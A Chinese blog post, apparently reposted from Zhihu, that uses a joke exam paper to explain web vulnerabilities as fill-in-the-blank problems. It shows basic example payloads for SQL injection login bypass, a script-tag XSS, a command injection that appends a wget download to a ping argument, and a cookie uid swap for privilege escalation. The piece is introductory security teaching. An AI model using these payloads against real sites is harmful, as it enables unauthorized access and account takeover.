一份试卷引发的思索


作者:长短短
链接:https://zhuanlan.zhihu.com/p/24216611
来源:知乎
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

试 卷

姓名________ 学号________

首先我们来看这个,试卷的名字和编号填写,这个部分有“漏洞”吗?

学生的姓名和编号都写在这儿,没有做任何保护措施,因此,你只要偷看了某人的试卷上的这部分内容,然后把你的试卷的上的姓名和考生编码写成和他一样的即可伪装出他的身份。

漏洞攻击成功

一、诗歌补写

1 床前没月光,___________。

2 春眠不觉晓,___________。

这道题有漏洞吗?

这道题的答案本来应该是“疑似地上霜”和“处处闻啼鸟”

But,问题中,并没有规定答案里不能添加标点符号,所以,我完全可以把“疑是地上霜,举头望明月,低头思故乡”以及“处处闻啼鸟,夜来风雨声,花落知多少”当做答案写进去。

漏洞再次进攻成功 :P

二、数学运算(在括号内填入数字)

3 500 + 400 * 3 / 2 + 1 = ( )

4 ( 1 + 2 ) / 3 * 400 +500 = ( )

这个问题有漏洞吗?

出题者规定了只能填入数字,但却没有说是什么数字,也没有规定多少位,那么我的答案可以是 中文数字「壹佰壹拾圆」、罗马数字「MCI」或「0000000000001101」。

漏洞第三次进攻成功 :D

三、技术实践

我们打开一个网页提交登录或者是搜索都会经过服务器做一系列的处理又回到浏览器,在这个过程中我们提交的数据会被带入到一系列的填空题中,有的是我们能猜到的,有的是意想不到的,有的会经过SQL进行查询进行填空,有的会被带入到命令行中进行填空,最后又把结果返回给浏览器进行填空,也最后就是我们到的结果了。

  • 用户登录 SQL 注入填空
    • Q:select * from username = ____ and password=_____
    • A:select * from username = "test" or ""="" and password="123456"
    • 解释:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
  • 用户名 XSS 注入填空
    • Q:<p style='color:red'>你好啊,尊敬的______<p>
    • A:<p style='color:red'>你好啊,尊敬的 xxx<script>alert(1)</script><p>
    • 解释:攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
  • 远程命令注入填空
    • Q:ping _______
    • A:ping www.baidu.com & wget xxxxxxxxxxx
    • 解释:用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致执行命令。
  • Cookie 身份越权测试
    • Cookie: uid=11426;
    • Cookie: uid=1;
    • 解释:越权漏洞是比较常见的漏洞类型,可以理解为,一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽未对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。​

了解了这几个漏洞之后我们可以看到原理都类似,也很简单,当然我们不再局限于概念名词就会发现 web 安全的大部分漏洞都很简单。更多时候,发现一个复杂的漏洞需要是只是耐心。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值